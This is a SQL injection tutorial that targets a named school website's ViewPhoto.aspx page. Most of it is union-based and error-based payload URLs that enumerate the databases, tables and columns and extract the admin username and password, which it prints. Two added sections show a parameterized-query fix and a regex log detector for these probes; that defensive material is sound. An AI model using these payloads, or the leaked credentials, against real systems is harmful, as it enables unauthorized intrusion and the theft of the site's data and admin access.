mssql server injection tutorial
This is how I injected an MSSQL server behind an .aspx page.
vul link = http://ogis.edu.in/ViewPhoto.aspx?gid=46
1st way:
Finding version:
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 or 1=cast(@@version as int)
Finding database:
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 or 1=convert(int,db_name())
I will not go deep into this method. There is already a tutorial about it here.
2nd way:
1. Finding the number of columns:
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 order by 1-- -
It loads normally. That's good.
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 order by 10-- -
output:
So let's reduce it.
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 order by 9-- -
The page loads normally. So there are 9 columns.
2. Next we do UNION all SELECT.
Remember, in MSSQL with aspx you will never get the vulnerable columns shown. You have to find them manually.
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT 1,2,3,4,5,6,7,8,9-- -
output:
Don't worry. There are two ways from here.
1st way (easy): this way will work rarely and it's normal injection.
Just change gid=46 to gid=-46.
So the injection will be
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,2,3,4,5,6,7,8,9-- -
output:
[Image: 50983947.jpg]
vul col=2
version=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,@@version,3,4,5,6,7,8,9-- -
@@version gives the version in MSSQL.
Remember, version() will not work here.
user=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,user_name(),3,4,5,6,7,8,9-- -
You can also use current_user, user or system_user instead of user_name().
database=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,db_name(),3,4,5,6,7,8,9-- -
db_name() gives the primary database.
Now replace db_name() with db_name(1), db_name(2), ..., db_name(n) until you have all the databases.
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,db_name(1),3,4,5,6,7,8,9-- -
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,db_name(11),3,4,5,6,7,8,9-- -
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,schema_name,3,4,5,6,7,8,9 from information_Schema.schemata-- -
This gives all the databases in one go.
Tables=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,table_name,3,4,5,6,7,8,9 from information_Schema.tables where table_schema!=db_name()-- -
Here !=db_name() means other than the primary database.
So we get the tables of the other databases. The spicy table is o_adminmst.
columns=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,column_name,3,4,5,6,7,8,9 from information_Schema.columns where table_name='o_adminmst'-- -
data=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,username,3,4,5,6,7,8,9 from o_adminmst-- -
username=admin
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,password,3,4,5,6,7,8,9 from o_adminmst-- -
pass=admin123#.
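The whole union chain above works only because the gid parameter is pasted into the SQL text. The following is an added example, not code from the original paste or from the site it targets: the same gid lookup written twice in Python, once with string concatenation (the defect) and once with a bound parameter plus input validation (the fix). SQLite stands in for SQL Server so it runs offline; the table and column names mirror the paste, the rows and the three-column photos table are constructed for the demo.

```python
# Added example (not code from the original paste). The ViewPhoto.aspx-style
# lookup written twice: the way the tutorial exploits it (gid concatenated
# into the SQL text) and with a validated, bound parameter. SQLite stands in
# for SQL Server; schema names mirror the paste, the rows are constructed.
import re
import sqlite3

# The tutorial's union payload, constructed to fit this demo's three columns.
PAYLOAD = "-46 UNION ALL SELECT 1,username,password FROM o_adminmst-- -"


def build_db() -> sqlite3.Connection:
    """Constructed sample schema: the photos table the page is meant to
    read and an admin table it must never expose."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE photos (gid INTEGER, title TEXT, path TEXT);
        INSERT INTO photos VALUES (46, 'Sports day', '/img/46.jpg');
        CREATE TABLE o_adminmst (adminid INTEGER, username TEXT, password TEXT);
        INSERT INTO o_adminmst VALUES (1, 'admin', 's3cret-example');
        """
    )
    return conn


def view_photo_vulnerable(conn: sqlite3.Connection, gid: str) -> list:
    """Query built by string concatenation: whatever arrives in ?gid= is
    parsed as SQL, which is exactly what the tutorial relies on."""
    sql = "SELECT gid, title, path FROM photos WHERE gid = " + gid
    return conn.execute(sql).fetchall()


def view_photo_fixed(conn: sqlite3.Connection, gid: str) -> list:
    """Validate, then bind. The value is passed as a parameter, so UNION,
    comments and cast/convert tricks never reach the SQL parser. Rejecting
    non-integers up front also means no database error text (the
    'Conversion failed ...' oracle the tutorial reads) is ever produced."""
    if not re.fullmatch(r"-?\d+", gid):
        raise ValueError("gid must be an integer")
    sql = "SELECT gid, title, path FROM photos WHERE gid = ?"
    return conn.execute(sql, (int(gid),)).fetchall()


def demo() -> dict:
    """Run both versions against the normal id and against the payload."""
    conn = build_db()
    try:
        fixed_payload = view_photo_fixed(conn, PAYLOAD)
    except ValueError as exc:
        fixed_payload = f"rejected: {exc}"
    return {
        "normal": view_photo_vulnerable(conn, "46"),
        "vulnerable": view_photo_vulnerable(conn, PAYLOAD),
        "fixed_normal": view_photo_fixed(conn, "46"),
        "fixed_payload": fixed_payload,
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

With the concatenated query the payload returns the admin row; the bound version returns the photo for 46 and rejects the payload before any SQL runs. The same change in the ASP.NET page means passing gid through a SqlParameter on the SqlCommand instead of concatenating it, and serving a generic error page (customErrors in web.config) so raw exception text never reaches the browser.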
2nd way (important): This way will work with UNION on many sites and challenges.
Let's say you are stuck here:
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT 1,2,3,4,5,6,7,8,9-- -
Now replace all the columns with NULL, so it will look like
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT null,null,null,null,null,null,null,null,null-- -
Now start replacing every null with convert(int,@@version) or cast(@@version as int).
In my case replacing the first null gives the answer.
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT convert(int,@@version),null,null,null,null,null,null,null,null-- -
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT cast(@@version as int),null,null,null,null,null,null,null,null-- -
user=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT cast(user_name() as int),null,null,null,null,null,null,null,null-- -
output=
Conversion failed when converting the nvarchar value 'db_ogis ' to data type int.
You can also use current_user, user or system_user instead of user_name().
database=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT cast(db_name() as int),null,null,null,null,null,null,null,null-- -
output=
Conversion failed when converting the nvarchar value 'db_ogis ' to data type int.
Tables=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT convert(int,(select top 1 table_name from information_schema.tables where table_schema!=db_name())),null,null,null,null,null,null,null,null-- -
output=Conversion failed when converting the nvarchar value 'o_updatemst ' to data type int.
For the next table:
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT convert(int,(select top 1 table_name from information_schema.tables where table_schema!=db_name() and table_name<>'o_updatemst')),null,null,null,null,null,null,null,null-- -
output=Conversion failed when converting the nvarchar value 'o_pagemaster ' to data type int.
columns=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT convert(int,(select top 1 column_name from information_schema.columns where table_name='o_adminmst')),null,null,null,null,null,null,null,null-- -
Conversion failed when converting the nvarchar value 'adminid' to data type int.
For the next column, same as for the tables:
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT convert(int,(select top 1 column_name from information_schema.columns where table_name='o_adminmst' and column_name<>'adminid')),null,null,null,null,null,null,null,null-- -
Conversion failed when converting the nvarchar value 'username' to data type int.
data=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT convert(int,(select top 1 username from o_adminmst)),null,null,null,null,null,null,null,null-- -
Conversion failed when converting the varchar value 'admin' to data type int.
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT convert(int,(select top 1 password from o_adminmst)),null,null,null,null,null,null,null,null-- -
Conversion failed when converting the varchar value 'admin123# ' to data type int.
You can use %2b to get the username and password at one time.
%2b = +
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT convert(int,(select top 1 username%2b'/'%2bpassword from o_adminmst)),null,null,null,null,null,null,null,null-- -
Conversion failed when converting the varchar value 'admin/admin123# ' to data type int.
That's it.
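Every step in both ways leaves two traces: the probe itself in the web server's request log (order by N, UNION all SELECT, cast/convert to int, @@version, db_name(), information_schema, the trailing -- -) and, for the 2nd way, the "Conversion failed when converting ..." text that the application echoed back. The following is an added example, not from the original paste: a small Python detector that replays the tutorial's probes as constructed IIS-style log lines and flags them, plus a check for the error text in a response body. The log layout (date time c-ip cs-method cs-uri-stem cs-uri-query sc-status), the client address and the timestamps are all constructed for the demo.

```python
# Added example (not code from the original paste). Flags the request-side
# patterns the tutorial uses and the response-side oracle it reads. All log
# lines, addresses, timestamps and the response body are constructed.
import re
from urllib.parse import unquote_plus

REQUEST_PATTERNS = {
    # column counting: ... order by 9-- -
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    # union-based extraction: ... UNION all SELECT 1,2,3 ...
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    # error-based oracle: cast(x as int) / convert(int, x)
    "int_conversion_oracle": re.compile(
        r"\bcast\s*\(.+?\bas\s+int\s*\)|\bconvert\s*\(\s*int\s*,", re.I),
    # SQL Server metadata the tutorial pulls
    "sqlserver_metadata": re.compile(
        r"@@version|\b(db_name|user_name)\s*\(|\bsystem_user\b|information_schema\.",
        re.I),
    # trailing comment that discards the rest of the original query
    "comment_terminator": re.compile(r"--\s*-?$"),
}

# The oracle text that leaked through the page's error handling.
RESPONSE_PATTERN = re.compile(
    r"Conversion failed when converting the \w+ value '.*?' to data type \w+")


def normalize(query: str) -> str:
    """Decode the query string as the server would (%20 and + to space,
    %2b to +) and collapse whitespace so the patterns match reliably."""
    return re.sub(r"\s+", " ", unquote_plus(query)).strip()


def classify_request(query: str) -> list:
    """Names of every pattern found in one cs-uri-query value."""
    q = normalize(query)
    return [name for name, rx in REQUEST_PATTERNS.items() if rx.search(q)]


def parse_iis_line(line: str) -> dict:
    """Constructed W3C-style layout; a real log's #Fields header gives the
    real column order and should drive this split."""
    date, time, ip, method, stem, query, status = line.split()
    return {"date": date, "time": time, "ip": ip, "method": method,
            "stem": stem, "query": query, "status": int(status)}


def scan(lines) -> list:
    """One finding (time, client, status, tags) per request that matches."""
    findings = []
    for line in lines:
        rec = parse_iis_line(line)
        tags = classify_request(rec["query"])
        if tags:
            findings.append((rec["time"], rec["ip"], rec["status"], tags))
    return findings


def response_leaks_sql_error(body: str) -> bool:
    """True if a response body carries the conversion-error oracle."""
    return RESPONSE_PATTERN.search(body) is not None


# Constructed log lines: a normal hit followed by three of the tutorial's probes.
LOG_LINES = [
    "2013-05-12 10:01:02 203.0.113.7 GET /ViewPhoto.aspx gid=46 200",
    "2013-05-12 10:01:09 203.0.113.7 GET /ViewPhoto.aspx gid=46%20order%20by%2010--%20- 500",
    "2013-05-12 10:01:20 203.0.113.7 GET /ViewPhoto.aspx "
    "gid=-46%20UNION%20all%20SELECT%201,@@version,3,4,5,6,7,8,9--%20- 200",
    "2013-05-12 10:01:31 203.0.113.7 GET /ViewPhoto.aspx "
    "gid=46%20UNION%20all%20SELECT%20convert(int,(select%20top%201%20table_name%20from"
    "%20information_schema.tables%20where%20table_schema!=db_name())),"
    "null,null,null,null,null,null,null,null--%20- 500",
]

# Constructed response body modelled on the error text quoted in the tutorial.
SAMPLE_ERROR_BODY = (
    "Server Error in '/' Application. Conversion failed when converting the "
    "nvarchar value 'db_ogis ' to data type int."
)

if __name__ == "__main__":
    for finding in scan(LOG_LINES):
        print(finding)
    print("response leaks oracle:", response_leaks_sql_error(SAMPLE_ERROR_BODY))
```

The three probe lines are each tagged, the plain request is not, and the sample body trips the response check. In practice the useful alert is the combination: several tagged requests from one client within a short window, and any 500 whose body matches RESPONSE_PATTERN, which is also the signal that the application is leaking database errors and needs a generic error page.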